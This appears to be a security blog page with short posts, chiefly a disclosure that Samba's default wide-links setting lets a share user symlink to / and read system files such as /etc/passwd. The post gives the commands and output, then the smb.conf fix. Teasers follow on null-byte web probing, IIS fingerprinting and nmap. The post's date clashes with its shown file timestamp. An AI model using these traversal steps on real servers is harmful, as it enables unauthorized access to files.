Noticed a security issue with default samba configurations shipped with most Linux distros.

For example lets say we have a system A with a writable share XYZ. On an other system B,
we mount the share and create a link to /, i.e to the root directory.

[root@B] smbmount //A/XYZ /mnt/share -o username=test
Password:
[root@B] ln -s / /mnt/share/ROOT

Now using the smbclient tool to access the share

[root@B] smbclient -U test //A/XYZ
Password:
Domain=[A] OS=[Unix] Server=[Samba 3.0.26a]
smb: \> ls ROOT/etc/passwd
passwd 879 Tue Sep 4 16:11:56 2007
37760 blocks of size 1048576. 9355 blocks available
smb: \>

As you can see the whole file system is now accessible, the attacker can download all
accessible files across the file system on A.

To make sure this does not happen add the following directive to smb.conf in
[global] section.

wide links=no

| by warl0ck on June 21st, 2007 at 3:20 pm | permanent link |

The %00 is the famous null character when encoded in a URL. It is interesting to see how
different web servers behave when a null character is there in the GET request.

I use a simple python program that accepts the website name and URL to get, responds with the
web server version if available in the header and HTTP response code.

% ./uget.py
usage: ./uget.py <website name> <url>

continued…

| by warl0ck on May 17th, 2007 at 4:27 am | permanent link |

It is interesting that global.asa has never caught eyes of penetration testers while fingerprinting an IIS web server.(Could not find any tool that does it).
continued…

| by warl0ck on October 22nd, 2006 at 11:41 pm | permanent link |

Generally for ports reported filtered by nmap for a host, it is hard to
tell who blocked the probes, for example.
continued…

| by warl0ck on October 22nd, 2006 at 11:39 pm | permanent link |